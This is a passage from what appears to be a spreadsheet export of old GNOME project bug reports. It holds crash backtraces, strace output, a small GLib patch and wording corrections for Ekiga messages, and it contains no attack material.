        v_pointer = 0x8000000}}} {g_type = 138214896 data = {{
        v_int = -1077844120 v_uint = 3217123176 v_long = -1077844120 
        v_ulong = 3217123176 v_int64 = -5215288547052787864 
        v_uint64 = 13231455526656763752 v_float = -1.51096821 
        v_double = -9.0610181033199796e-41 v_pointer = 0xbfc16768} {
        v_int = 138214816 v_uint = 138214816 v_long = 138214816 
        v_ulong = 138214816 v_int64 = -5231596927501664864 
        v_uint64 = 13215147146207886752 v_float = 5.68723269e-34 
        v_double = -7.7608289773520627e-42 v_pointer = 0x83cfda0}}} {
    g_type = 3076065892 data = {{v_int = 135036112 v_uint = 135036112 
        v_long = 135036112 v_ulong = 135036112 v_int64 = 135036112 
        v_uint64 = 135036112 v_float = 4.22764339e-34 
        v_double = 6.6716703887170903e-316 v_pointer = 0x80c7cd0} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 579975719178731520 v_uint64 = 579975719178731520 
        v_float = 0 v_double = 6.7404802670392183e-270 v_pointer = 0x0}}} {
    g_type = 3083008432 data = {{v_int = -1218082308 v_uint = 3076884988 
        v_long = -1218082308 v_ulong = 3076884988 
        v_int64 = -5231596993282471428 v_uint64 = 13215147080427080188 
        v_float = -1.36815906e-05 v_double = -7.7607451414553868e-42 
        v_pointer = 0xb76589fc} {v_int = -16 v_uint = 4294967280 
        v_long = -16 v_ulong = 4294967280 v_int64 = -5224226518946807824 
        v_uint64 = 13222517554762743792 v_float = -nan(0x7ffff0) 
        v_double = -2.2829002135729908e-41 v_pointer = 0xfffffff0}}} {
    g_type = 138160072 data = {{v_int = -1218076088 v_uint = 3076891208 
        v_long = -1218076088 v_ulong = 3076891208 v_int64 = 37436629576 
        v_uint64 = 37436629576 v_float = -1.36872477e-05 
        v_double = 1.8496152569585952e-313 v_pointer = 0xb765a248} {
        v_int = -1216948107 v_uint = 3078019189 v_long = -1216948107 
        v_ulong = 3078019189 v_int64 = -5245320255605647243 
        v_uint64 = 13201423818103904373 v_float = -1.47131404e-05 
        v_double = -9.3624576374482877e-43 v_pointer = 0xb776d875}}} {
    g_type = 138082792 data = {{v_int = -1077844072 v_uint = 3217123224 
        v_long = -1077844072 v_ulong = 3217123224 
        v_int64 = -5245347481264232552 v_uint64 = 13201396592445319064 
        v_float = -1.51097393 v_double = -9.3190846609807781e-43 
        v_pointer = 0xbfc16798} {v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = -5224226523241775103 
        v_uint64 = 13222517550467776513 v_float = 1.40129846e-45 
        v_double = -2.2828991188085699e-41 v_pointer = 0x1}}} {
    g_type = 3217123304 data = {{v_int = -1216658505 v_uint = 3078308791 
        v_long = -1216658505 v_ulong = 3078308791 
        v_int64 = 579974176068813751 v_uint64 = 579974176068813751 
        v_float = -1.49765319e-05 v_double = 6.7391831147430915e-270 
        v_pointer = 0xb77b43b7} {v_int = -1218076096 v_uint = 3076891200 
        v_long = -1218076096 v_ulong = 3076891200 v_int64 = 37436629568 
        v_uint64 = 37436629568 v_float = -1.36872404e-05 
        v_double = 1.8496152565633427e-313 v_pointer = 0xb765a240}}} {
    g_type = 135037136 data = {{v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0} {v_int = 135036112 v_uint = 135036112 
        v_long = 135036112 v_ulong = 135036112 v_int64 = 135036112 
        v_uint64 = 135036112 v_float = 4.22764339e-34 
        v_double = 6.6716703887170903e-316 v_pointer = 0x80c7cd0}}} {
    g_type = 23 data = {{v_int = 135006976 v_uint = 135006976 
        v_long = 135006976 v_ulong = 135006976 
        v_int64 = -4629304695695078656 v_uint64 = 13817439378014472960 
        v_float = 4.2142648e-34 v_double = -0.13598347084924711 
        v_pointer = 0x80c0b00} {v_int = -1211958864 v_uint = 3083008432 
        v_long = -1211958864 v_ulong = 3083008432 v_int64 = 3083008432 
        v_uint64 = 3083008432 v_float = -2.3242872e-05 
        v_double = 1.5232085520900888e-314 v_pointer = 0xb7c2f9b0}}} {
    g_type = 8 data = {{v_int = 160 v_uint = 160 v_long = 160 
        v_ulong = 160 v_int64 = -5226752320494108512 
        v_uint64 = 13219991753215443104 v_float = 2.24207754e-43 
        v_double = -1.6390867713121015e-41 v_pointer = 0xa0} {
        v_int = -1221271292 v_uint = 3073696004 v_long = -1221271292 
        v_ulong = 3073696004 v_int64 = 592836675402785028 
        v_uint64 = 592836675402785028 v_float = -1.07812266e-05 
        v_double = 4.9553732728995672e-269 v_pointer = 0xb734e104}}} {
    g_type = 3217123320 data = {{v_int = -1221277631 v_uint = 3073689665 
        v_long = -1221277631 v_ulong = 3073689665 v_int64 = 7368656961 
        v_uint64 = 7368656961 v_float = -1.07754613e-05 
        v_double = 3.640600260419062e-314 v_pointer = 0xb734c841} {
        v_int = -1216360024 v_uint = 3078607272 v_long = -1216360024 
        v_ulong = 3078607272 v_int64 = -4629304280434617944 
        v_uint64 = 13817439793274933672 v_float = -1.52479988e-05 
        v_double = -0.13599499664236459 v_pointer = 0xb77fd1a8}}} {
    g_type = 3078308791 data = {{v_int = 135035760 v_uint = 135035760 
        v_long = 135035760 v_ulong = 135035760 
        v_int64 = -5223603026999346320 v_uint64 = 13223141046710205296 
        v_float = 4.22748176e-34 v_double = -2.5877626162064868e-41 
        v_pointer = 0x80c7b70} {v_int = -1077843864 v_uint = 3217123432 
        v_long = -1077843864 v_ulong = 3217123432 
        v_int64 = 579980086082627688 v_uint64 = 579980086082627688 
        v_float = -1.51099873 v_double = 6.7441511263543271e-270 
        v_pointer = 0xbfc16868}}} {g_type = 0 data = {{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 579975684818993152 
        v_uint64 = 579975684818993152 v_float = 0 
        v_double = 6.7404513839292045e-270 v_pointer = 0x0} {v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 107374182400 
        v_uint64 = 107374182400 v_float = 0 
        v_double = 5.3049894774131808e-313 v_pointer = 0x0}}} {
    g_type = 135006976 data = {{v_int = -1077843888 v_uint = 3217123408 
        v_long = -1077843888 v_ulong = 3217123408 
        v_int64 = -5226752317276985264 v_uint64 = 13219991756432566352 
        v_float = -1.51099586 v_double = -1.6390875913397853e-41 
        v_pointer = 0xbfc16850} {v_int = -1221271292 v_uint = 3073696004 
        v_long = -1221271292 v_ulong = 3073696004 v_int64 = 54613303556 
        v_uint64 = 54613303556 v_float = -1.07812266e-05 
        v_double = 2.6982557092919187e-313 v_pointer = 0xb734e104}}} {
    g_type = 3217123400 data = {{v_int = -1221277631 v_uint = 3073689665 
        v_long = -1221277631 v_ulong = 3073689665 v_int64 = 7368656961 
        v_uint64 = 7368656961 v_float = -1.07754613e-05 
        v_double = 3.640600260419062e-314 v_pointer = 0xb734c841} {
        v_int = -1216360024 v_uint = 3078607272 v_long = -1216360024 
        v_ulong = 3078607272 v_int64 = -4629303936837234264 
        v_uint64 = 13817440136872317352 v_float = -1.52479988e-05 
        v_double = -0.13600453338552865 v_pointer = 0xb77fd1a8}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 20
	param_values = (GValue *) 0xbfc16720
	node = (SignalNode *) 0x812f368
	i = 1
	n_params = 1
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#19 0xb7819589 in IA__g_signal_emit (instance=0x89 signal_id=137 detail=137)
    at gsignal.c:2241
	var_args = 0xbfc1690c `}\037\b(iÃÂ¿`}\037\b
#20 0xb7b634df in gtk_widget_event_internal (widget=0x83c1700 
    event=0x81f7d60) at gtkwidget.c:3735
	signal_num = 
	return_val = 0
#21 0xb7a80098 in IA__gtk_main_do_event (event=0x81f7d60) at gtkmain.c:1346
	event_widget = (GtkWidget *) 0x83c1700
	grab_widget = (GtkWidget *) 0x83c1700
	window_group = (GtkWindowGroup *) 0x8215590
	next_event = 
	rewritten_event = (GdkEvent *) 0x0
	tmp_list = 
	__PRETTY_FUNCTION__ = IA__gtk_main_do_event
#22 0xb7a08666 in gtk_dialog_close (dialog=0x83c1700) at gtkdialog.c:429
	event = (GdkEvent *) 0x81f7d60
#23 0xb7814663 in IA__g_cclosure_marshal_VOID__VOID (closure=0x83a31e8 
    return_value=0x0 n_param_values=1 param_values=0x83d1c50 
    invocation_hint=0xbfc16b3c marshal_data=0xb7a08617) at gmarshal.c:77
	data1 = (gpointer) 0x83c1700
	data2 = (gpointer) 0x89
	__PRETTY_FUNCTION__ = IA__g_cclosure_marshal_VOID__VOID
#24 0xb7807165 in g_type_class_meta_marshal (closure=0x83a31e8 
    return_value=0x89 n_param_values=137 param_values=0x83d1c50 
    invocation_hint=0x89 marshal_data=0x89) at gclosure.c:567
	callback = 
#25 0xb7807798 in IA__g_closure_invoke (closure=0x83a31e8 return_value=0x89 
    n_param_values=137 param_values=0x89 invocation_hint=0x89)
    at gclosure.c:490
	marshal = (GClosureMarshal) 0xb7807120 
	marshal_data = (gpointer) 0x1cc
	in_marshal = 0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#26 0xb7817e6e in signal_emit_unlocked_R (node=0x83a3200 detail=0 
    instance=0x83c1700 emission_return=0x0 instance_and_params=0x83d1c50)
    at gsignal.c:2476
	tmp = 
	handler = (Handler *) 0x80c258a
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0xbfc16f44 instance = 0x83c1700 ihint = {
    signal_id = 185 detail = 0 run_type = G_SIGNAL_RUN_LAST} 
  state = EMISSION_RUN chain_type = 138028696}
	class_closure = (GClosure *) 0x83a31e8
	</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-470848</t>
  </si>
  <si>
    <t>One-line hits displayed with a second line</t>
  </si>
  <si>
    <t>Subject says it all... hits which need only one line for displaying information have a second blank line. And I think hits which have 2 lines (file name and text for doc files for example) have a third blank line</t>
  </si>
  <si>
    <t>EVOLUTION-239799</t>
  </si>
  <si>
    <t>Evolution hangs after applying Summary settings</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Specifically this hang occurs after applying changes to the local folders
displayed on the Summary page. After selecting the local folders I want and
clicking Apply Evolution becomes mostly unresponsive. I can still close
the settings window using the Close button but the main Evolution window
will not refresh. I've included the strace output at the bottom of this report.
Steps to reproduce the problem:
1. Open the Evolution Settings window from the Tools menu.
2. Click on Summary Preferences
3. Click on the tab labelled Mail
4. Expand the Local tree and click on the checkbox buttons beside any
folders of your choosing.
5. Click the Apply button.
Actual Results:
CPU usage increases to 80-99%. The button widgets still visible in the
Settings window will still respond to clicks and the Settings window will
disappear when the Close button is clicked but the main window will not
refresh when it is brought into focus again.
Expected Results:
Settings will be applied and the program will run normally afterward.
How often does this happen? 
Everytime I apply the changes to the local folders displayed on the Summary
page.
Additional Information:
strace output contains the following repeated endlessly until the process
is killed:
ioctl(3 0x541b [0])                   = 0
gettimeofday({1047739882 23157} NULL) = 0
poll([{fd=4 events=POLLIN} {fd=3 events=POLLIN} {fd=8 events=POLLIN}
{fd=10 events=POLLIN|POLLPRI} {fd=11 events=POLLIN|POLLPRI} {fd=12
events=POLLIN|POLLPRI} {fd=13 events=POLLIN|POLLPRI} {fd=15
events=POLLIN|POLLPRI} {fd=14 events=POLLIN|POLLPRI} {fd=16
events=POLLIN} {fd=18 events=POLLIN} {fd=20 events=POLLIN} {fd=22
events=POLLIN|POLLPRI} {fd=33 events=POLLIN|POLLPRI} {fd=38 events=0}
{fd=41 events=0 revents=POLLERR|POLLHUP} {fd=44 events=0
revents=POLLERR|POLLHUP} {fd=45 events=0 revents=POLLERR|POLLHUP}
{fd=54 events=POLLIN|POLLPRI}] 19 0) = 3
gettimeofday({1047739882 24533} NULL) = 0
ioctl(3 0x541b [0])                   = 0
gettimeofday({1047739882 25545} NULL) = 0
poll([{fd=4 events=POLLIN} {fd=3 events=POLLIN} {fd=8 events=POLLIN}
{fd=10 events=POLLIN|POLLPRI} {fd=11 events=POLLIN|POLLPRI} {fd=12
events=POLLIN|POLLPRI} {fd=13 events=POLLIN|POLLPRI} {fd=15
events=POLLIN|POLLPRI} {fd=14 events=POLLIN|POLLPRI} {fd=16
events=POLLIN} {fd=18 events=POLLIN} {fd=20 events=POLLIN} {fd=22
events=POLLIN|POLLPRI} {fd=33 events=POLLIN|POLLPRI} {fd=38 events=0}
{fd=41 events=0 revents=POLLERR|POLLHUP} {fd=44 events=0
revents=POLLERR|POLLHUP} {fd=45 events=0 revents=POLLERR|POLLHUP}
{fd=54 events=POLLIN|POLLPRI}] 19 0) = 3
gettimeofday({1047739882 26825} NULL) = 0
System Details: 
XFree86 4.3.0
Gnome 2.2</t>
  </si>
  <si>
    <t>tphamm</t>
  </si>
  <si>
    <t>GDM-148356</t>
  </si>
  <si>
    <t>GDM does not include native Azerbaijani text in language selection</t>
  </si>
  <si>
    <t>When logging in select language settings in GDM notice that while Azerbaijani
_is_ there the native version is not.</t>
  </si>
  <si>
    <t>metin</t>
  </si>
  <si>
    <t>GALEON-57062</t>
  </si>
  <si>
    <t>History window timeselection forever is wrong tense.</t>
  </si>
  <si>
    <t>The timeselection in the search feature in the historywindow/dock uses
forever as a keyword for searching/showing all of history forever
implies future(?) wich is the wrong tense. It might work in English but
makes it very hard for translators to get the correct translation.</t>
  </si>
  <si>
    <t>GLIB-337129</t>
  </si>
  <si>
    <t>Compile warnings in G_IMPLEMENT_INTERFACE</t>
  </si>
  <si>
    <t>The following patch turns off compile warnings in any code using G_IMPLEMENT_INTERFACE:
Index: gtype.h
===================================================================
RCS file: /cvs/gnome/glib/gobject/gtype.hv
retrieving revision 1.63
diff -u -p -d -r1.63 gtype.h
--- gtype.h     27 Sep 2005 23:19:16 -0000      1.63
+++ gtype.h     4 Apr 2006 02:39:44 -0000
@@ -3407 +3409 @@ gpointer g_type_instance_get_private
  */
 #define G_IMPLEMENT_INTERFACE(TYPE_IFACE iface_init)       { \
   static const GInterfaceInfo g_implement_interface_info = { \
-    (GInterfaceInitFunc) iface_init \
+    (GInterfaceInitFunc) iface_init \
+    NULL \
+    NULL \
   } \
   g_type_add_interface_static (g_define_type_id TYPE_IFACE  \
 }
The patch doesn't work right now because of bug #337128 and the fact that it introduces commas in toplevel (not inside parantheses) of the code.</t>
  </si>
  <si>
    <t>DOXYGEN-316944</t>
  </si>
  <si>
    <t>Inline formula does not work with inline parameter</t>
  </si>
  <si>
    <t>Version details: 1.4.4 and 1.4.4-20050918
Distribution/Version: XP SP1
It appears that inline formulae do not work inside inline parameter 
documentation.
i.e. running Doxygen on the following code Func1 Func2 and p1 are 
documented correctly but p2 does not include the formula (just dollar 
signs and brackets) and Doxygen gives warnings about unknown commands \f 
\frac etc.
//!   file testbug.cpp
/*! Function doc using formula \f$ \frac{\alpha}{\beta} \f$
      param p1 Param doc using formula \f$ \frac{\alpha}{\beta} \f$
*/
void Func1(int p1)
{
}
/*! Function doc using formula \f$ \frac{\alpha}{\beta} \f$
*/
void Func2(
                  int p2 //!&lt; Inline param doc using formula \f$ \frac{\alpha}
{\beta} \f$
                 )
{
}
It occurs with 1.4.4 and 1.4.4-20050918 using the default 
generated configuration file.</t>
  </si>
  <si>
    <t>bryan.kitts</t>
  </si>
  <si>
    <t>EKIGA-327240</t>
  </si>
  <si>
    <t>grammar/spelling errors</t>
  </si>
  <si>
    <t>#: ../src/devices/audio.cpp:500                                                                                                                                        
# c-format                                                                                                                                                            
msgid                                                                                                                                                                
Ekiga is now recording from %s and playing back to %s. Please say \1 2 3                                                                                           
Ekiga rocks!\ in your microphone you should hear yourself back into the                                                                                            
speakers with a 4 seconds delay.
You have a comma splice there where you have combined two separate sentences with just a comma between them. This is a run-on sentence and is always a grammar error. Also seconds should not be pluralized.
Please say \1 2 3 Ekiga rocks!\ into your microphone. You should hear yourself back in the speakers with a four-second delay.
#: ../src/devices/videoinput.cpp:379                                                                                                                                   
msgid                                                                                                                                                                
Your driver doesn't seem to support any of the colour formats supported by                                                                                           
Ekiga.\n                                                                                                                                                             
 Please check your kernel driver documentation in order to determine which                                                                                           
Palette is supported.
It's spelled color in American English.
#: ../src/gui/config.cpp:236                                                                                                                                           
msgid                                                                                                                                                                
You have changed a setting that doesn't permit to Ekiga to apply the new                                                                                             
change to the current call. Your new setting will only take effect for the                                                                                           
next call. 
The first sentence makes absolutely no sense. I'd try Ekiga cannot apply one or more changes to the current call. Your new settings will take effect for the next call.
#: ../src/gui/druid.cpp:715                                                                                                                                            
# c-format                                                                                                                                                            
msgid Ekiga.NET URL - page %d/%d
You call it Ekiga.net elsewhere. And making .NET in all-caps looks like it's screaming to me. Either make all the references be Ekiga.net or Ekiga.NET. I'd strongly suggest not capitalizing any of it and making it just ekiga.net like URLs are normally written.
#: ../src/gui/druid.cpp:765                                                                                                                                            
msgid I do not want to register to the Ekiga.NET free service
Grammar error. Try I do not want to sign up for the ekiga.net free service.
#: ../src/gui/main.cpp:1735                                                                                                                                            
msgid                                                                                                                                                                
You have chosen to start Ekiga hidden however the notification area is not                                                                                          
present in your panel Ekiga can thus not start hidden.
This is TWO comma splices. Comma splices are always a grammar error. I would suggest:
The notification area is not present in your panel so Ekiga cannot start hidden.
#: ../src/gui/main.cpp:4445                                                                                                                                            
# c-format                                                                                                                                                            
msgid                                                                                                                                                                
Ekiga got an invalid value for the GConf key %s.\n                                                                                                                   
\n                                                                                                                                                                   
It probably means that your GConf schemas have not been correctly installed                                                                                          
or the that permissions are not correct.\n                                                                                                                           
\n                                                                                                                                                                   
Please check the FAQ (http://www.ekiga.org/) the throubleshoot section of                                                                                           
the GConf site (http://www.gnome.org/projects/gconf/) or the mailing list                                                                                            
archives for more information (http://mail.gnome.org) about this problem.
Needs to be troubleshooting not troubleshoot.
#. Introduction label                                                                                                                                                  
#: ../src/gui/tools.cpp:309                                                                                                                                            
msgid                                                                                                                                                                
You can make calls to regular phones and cell numbers worldwide using Ekiga.                                                                                         
To enable this you need to register an account using the URL below then                                                                                            
enter your Account number and password and finally enable registering to                                                                                            
the Ekiga PC-To-Phone service.\n                                                                                                                                     
\n                                                                                                                                                                   
Please make sure you are using the URL below to get your account otherwise                                                                                           
the service will not work.    
This contains a couple grammar errors including a sentence that's too long to make sense of. I'd suggest:
You can make calls to regular phones and cell numbers worldwide using Ekiga. To enable this first create an account at the URL below. Enter your account number and password (where? in Ekiga? at the registration page? on a piece of paper?) and then enable registering to the Ekiga PC-To-Phone service.\n
The service will work only if your account is created using the URL below.
Please note also that enable registering to the Ekiga PC-To-Phone service makes absolutely no sense and I have no idea what to even suggest that you change it to.
#: ../ekiga.schemas.in.in.h:15                                                                                                                                         
msgid                                                                                                                                                                
Connection will be established in Fast Start mode. Fast Start is a new way                                                                                           
to start calls faster that was introduced in H.323v2. It is not supported by                                                                                         
Netmeeting and using both Fast Start and H.245 Tunnelling can crash some                                                                                             
versions of Netmeeting
You spell it Tunneling in the rest of the program and the word is indeed spelled Tunneling in American English.
#: ../ekiga.schemas.in.in.h:20                                                                                                                                         
msgid Enable H.245 tunnelling
Same here.
#: ../ekiga.schemas.in.in.h:147                                                                                                                                        
msgid                                                                                                                                                                
The range of TCP ports that Ekiga will use for the H.323 H.245 channel.                                                                                              
Ekiga needs to be restarted for the new values to take effect. This port                                                                                             
range has no effect if both participants to the conference are using H.245                                                                                           
Tunnelling.
Same here.
#: ../ekiga.schemas.in.in.h:149                                                                                                                                        
msgid                                                                                                                                                                
The range of UDP ports that Ekiga will use for SIP signalling and when                                                                                               
registering to gatekeepers. Ekiga needs to be restarted for the new values                                                                                           
to take effect.
It's signaling in American English.
#: ../ekiga.schemas.in.in.h:168                                                                                                                                        
msgid                                                                                                                                                                
This enables H.245 Tunnelling mode. In H.245 Tunnelling mode H.245 messages                                                                                          
are encapsulated into the the H.225 channel (port 1720). This saves one TCP                                                                                          
connection during calls. H.245 Tunnelling was introduced in H.323v2 and                                                                                              
Netmeeting does not support it. Using both Fast Start and H.245 Tunnelling                                                                                           
can crash some versions of Netmeeting.                            
You use Tunnelling instead of tunneling 4 times here.</t>
  </si>
  <si>
    <t>LIBGNOMEDB-106402</t>
  </si>
  <si>
    <t>broken ABI</t>
  </si>
  <si>
    <t>0.9.0 and 0.10.0 has different ABI. but soname wasn't bumped up. it took
along an unnecessary bug.</t>
  </si>
  <si>
    <t>PYGOBJECT-311226</t>
  </si>
  <si>
    <t>Metaclass registration causes breakage with old constructors</t>
  </si>
  <si>
    <t>I haven't looked in detail at the problem yet but it seems like the fix for bug
#161177 which introduces a new API for constructors breaks existing code.
E.g. if you run the attached test case you get:
[markmc@blaa foo]$ python foodialog.py
** (foodialog.py:9081): WARNING **: Constructor wrapper for GtkMessageDialog
needs to be updated to the new API
Traceback (most recent call last):
  File foodialog.py line 10 in ?
    FooDialog (None).run ()
  File foodialog.py line 7 in __init__
    gtk.MessageDialog.__init__ (self parent_window 0 gtk.MESSAGE_WARNING
gtk.BUTTONS_OK_CANCEL)
RuntimeError: __gobject_init__ must be used when subclassing gtk.MessageDialog
(Marking as a blocker since its API incompat basically)</t>
  </si>
  <si>
    <t>GOSSIP-426982</t>
  </si>
  <si>
    <t>Crash when typing in the roster</t>
  </si>
  <si>
    <t>To reproduce:
- log to your jabber account (I'm using telepathy but I doubt that's make any difference)
- click in the roster treeview
- type some letters to try to find a contact
- crash
I'm using current HEAD.
(gossip:17616): GLib-CRITICAL **: g_utf8_casefold: assertion `str != NULL' failed
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1228171568 (LWP 17616)]
0xb7182597 in strstr () from /lib/tls/i686/cmov/libc.so.6
(gdb) bt
#0  0xb7182597 in strstr () from /lib/tls/i686/cmov/libc.so.6
#1  0x080894f0 in contact_list_search_equal_func (model=0x811ba50 column=2 
    key=0x8511af0 d iter=0xbff701d8 search_data=0x81c9068)
    at gossip-contact-list.c:1510
#2  0xb7a839a8 in gtk_tree_view_search_iter (model=0x811ba50 
    selection=0x81c84c0 iter=0xbff701d8 text=0x8511af0 d 
    count=0xbff701e8 n=1) at gtktreeview.c:14064
#3  0xb7a85890 in gtk_tree_view_search_init (entry=0x825d000 
    tree_view=0x81c9068) at gtktreeview.c:14191
#4  0xb7a8b340 in gtk_tree_view_real_start_interactive_search (
    tree_view=0x81c9068 keybinding=)
    at gtktreeview.c:10169
#5  0xb7a8d893 in gtk_tree_view_key_press (widget=0x81c9068 event=0x81c1010)
    at gtktreeview.c:5311
#6  0xb79906b0 in _gtk_marshal_BOOLEAN__BOXED (closure=0x8132180 
    return_value=0xbff70400 n_param_values=2 param_values=0xbff704dc 
    invocation_hint=0xbff703ec marshal_data=0xb7a8d5e0) at gtkmarshalers.c:84
#7  0xb74cce49 in g_type_class_meta_marshal (closure=0x8132180 
    return_value=0xbff70400 n_param_values=2 param_values=0xbff704dc 
    invocation_hint=0xbff703ec marshal_data=0xcc) at gclosure.c:567
#8  0xb74ce70d in IA__g_closure_invoke (closure=0x8132180 
    return_value=0xbff70400 n_param_values=2 param_values=0xbff704dc 
    invocation_hint=0xbff703ec) at gclosure.c:490
---Type  to continue or q  to quit---
#9  0xb74df753 in signal_emit_unlocked_R (node=0x8132390 detail=0 
    instance=0x81c9068 emission_return=0xbff7069c 
    instance_and_params=0xbff704dc) at gsignal.c:2478
#10 0xb74e03ef in IA__g_signal_emit_valist (instance=0x81c9068 signal_id=51 
    detail=0 var_args=) at gsignal.c:2209
#11 0xb74e07e9 in IA__g_signal_emit (instance=0x81c9068 signal_id=51 
    detail=0) at gsignal.c:2243
#12 0xb7aa4e18 in gtk_widget_event_internal (widget=0x81c9068 event=0x81c1010)
    at gtkwidget.c:3915
#13 0xb7ab4e97 in IA__gtk_window_propagate_key_event (window=0x8160000 
    event=0x81c1010) at gtkwindow.c:4671
#14 0xb7ab7efc in gtk_window_key_press_event (widget=0x8160000 
    event=0x81c1010) at gtkwindow.c:4701
#15 0xb79906b0 in _gtk_marshal_BOOLEAN__BOXED (closure=0x8132180 
    return_value=0xbff70920 n_param_values=2 param_values=0xbff709fc 
    invocation_hint=0xbff7090c marshal_data=0xb7ab7eb0) at gtkmarshalers.c:84
#16 0xb74cce49 in g_type_class_meta_marshal (closure=0x8132180 
    return_value=0xbff70920 n_param_values=2 param_values=0xbff709fc 
    invocation_hint=0xbff7090c marshal_data=0xcc) at gclosure.c:567
#17 0xb74ce62b in IA__g_closure_invoke (closure=0x8132180 
    return_value=0xbff70920 n_param_values=2 param_values=0xbff709fc 
    invocation_hint=0xbff7090c) at gclosure.c:490
#18 0xb74df753 in signal_emit_unlocked_R (node=0x8132390 detail=0 
---Type  to continue or q  to quit---
    instance=0x8160000 emission_return=0xbff70bbc 
    instance_and_params=0xbff709fc) at gsignal.c:2478
#19 0xb74e03ef in IA__g_signal_emit_valist (instance=0x8160000 signal_id=51 
    detail=0 var_args=) at gsignal.c:2209
#20 0xb74e07e9 in IA__g_signal_emit (instance=0x8160000 signal_id=51 
    detail=0) at gsignal.c:2243
#21 0xb7aa4e18 in gtk_widget_event_internal (widget=0x8160000 event=0x81c1010)
    at gtkwidget.c:3915
#22 0xb79899fa in IA__gtk_propagate_event (widget=0x8160000 event=0x81c1010)
    at gtkmain.c:2338
#23 0xb798abc7 in IA__gtk_main_do_event (event=0x81c1010) at gtkmain.c:1598
#24 0xb780c12a in gdk_event_dispatch (source=0x811e5d0 callback=0 
    user_data=0x0) at gdkevents-x11.c:2318
#25 0xb745cdf2 in IA__g_main_context_dispatch (context=0x811e618)
    at gmain.c:2045
#26 0xb745fdcf in g_main_context_iterate (context=0x811e618 block=1 
    dispatch=1 self=0x80f6430) at gmain.c:2677
#27 0xb7460179 in IA__g_main_loop_run (loop=0x81e1eb0) at gmain.c:2881
#28 0xb798b044 in IA__gtk_main () at gtkmain.c:1177
#29 0x080960c3 in main (argc=1 argv=0x0) at gossip-main.c:207</t>
  </si>
  <si>
    <t>EPIPHANY-122959</t>
  </si>
  <si>
    <t>Crashed on start-up</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Red Hat Linux release 9 (Shrike)
Package: epiphany
Severity: normal
Version: GNOME2.4.0 unspecified
Gnome-Distributor: GNOME.Org
Synopsis: Crashed on start-up
Bugzilla-Product: epiphany
Bugzilla-Component: General
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.4.0.1)
Description:
Description of the crash:
I clicked on a link in Evolution to open a Bugzilla bug and Epiphany
crashed.
How often does this happen?
Once so far.
Debugging Information:
Backtrace was generated from '/opt/gnome24/bin/epiphany-bin'
[New Thread 1089844832 (LWP 6412)]
[New Thread 1128529200 (LWP 6417)]
[New Thread 1116949808 (LWP 6416)]
[New Thread 1106025776 (LWP 6415)]
0xffffe002 in ?? ()
#0  0xffffe002 in ?? ()
#1  0x40d0a9ab in g_main_context_poll (context=0x815b9f8 timeout=71 
    priority=2147483647 fds=0x824a218 n_fds=11) at gmain.c:2698
#2  0x40d09d32 in g_main_context_iterate (context=0x815b9f8 block=1 
    dispatch=1 self=0x814d1a8) at gmain.c:2375
#3  0x40d0a59b in g_main_loop_run (loop=0x81470b8) at gmain.c:2600
#4  0x408b1218 in bonobo_main () at bonobo-main.c:294
#5  0x0807d345 in main (argc=2 argv=0xbfffe294) at ephy-main.c:176
#6  0x420156a4 in __libc_start_main () from /lib/tls/libc.so.6
Thread 4 (Thread 1106025776 (LWP 6415)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x08113188 in _pr_poll_with_poll ()
No symbol table info available.
#2  0x41119b8e in NSGetModule ()
   from /usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#3  0x4111a405 in NSGetModule ()
   from /usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#4  0x400e0011 in nsThread::Main(void*) ()
   from /usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#5  0x0811455d in _pt_root ()
No symbol table info available.
#6  0x40cd2332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1116949808 (LWP 6416)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x40219571 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:738
	estatus = 23881
	eret = 1073831404
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {1073791923 1073834204 1089705584 1 0 0
1073833792 
      1116941156 1073791823 1073834204 1 1 1074025084 1107773195
      1108548116 1108550432 137064008 1116941148 1107769222
1108550432 
      137064008 1074024160 1074024160 137063840 134694956
1116941180 
      1074011648 137064008 1073791600 0 1074011553 1074024160}} 
  sa_flags = 1074023724 sa_restorer = 0x42932b9c}
	pid = 6419
#2  0x40041515 in nsProfileLock::FatalSignalHandler(int) ()
   from /usr/lib/libgtkembedmoz.so
No symbol table info available.
#3  
No symbol table info available.
#4  0x40009541 in do_lookup_versioned () from /lib/ld-linux.so.2
No symbol table info available.
#5  0x400086e6 in _dl_lookup_versioned_symbol_internal ()
   from /lib/ld-linux.so.2
No symbol table info available.
#6  0x4000c3b3 in fixup () from /lib/ld-linux.so.2
No symbol table info available.
#7  0x4000c270 in _dl_runtime_resolve () from /lib/ld-linux.so.2
No symbol table info available.
#8  0x40b62bd5 in __libc_res_nquery () from /lib/libresolv.so.2
No symbol table info available.
#9  0x40b6335b in __libc_res_nquerydomain () from /lib/libresolv.so.2
No symbol table info available.
#10 0x40b62f22 in __libc_res_nsearch () from /lib/libresolv.so.2
No symbol table info available.
#11 0x42b8005f in _nss_dns_gethostbyname2_r () from
/lib/libnss_dns.so.2
No symbol table info available.
#12 0x420f2863 in gethostbyname2_r@@GLIBC_2.1.2 () from
/lib/tls/libc.so.6
No symbol table info available.
#13 0x0810be71 in PR_GetIPNodeByName ()
No symbol table info available.
